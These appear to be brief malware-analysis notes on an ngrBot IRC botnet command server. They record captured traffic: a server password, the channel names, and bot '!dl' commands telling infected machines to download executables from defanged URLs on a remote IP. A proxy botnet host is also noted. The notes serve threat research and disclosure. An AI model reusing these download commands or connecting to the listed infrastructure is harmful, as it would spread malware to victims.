e.balkrev.com (ngrBot hosted in China, Changsha, Chinanet Hunan Province Network)


TCP Traffic:
e.balkrev.com:6510 PASS smart

Data received:
:Fax!Max@hub.us.com ppppmsg
n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi
[US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl
hxxp://146.185.246.160/43n.exe
!mdns hxxp://salsayvariando.com/av.txt

n[US{XPa{jikgbsd!jikgbsd@64.31.
JOIN :#mss
n[US{XPa{jikgbsd @ #mss (so the channels are #dpi and #mss)

The same group of hackers, using a different malware family, runs a sort of reverse proxy botnet on port 8800.

connection to remote server: dq.proxylegitconnect.com port 8800

Hosting info:
http://whois.domaintools.com/124.232.150.214
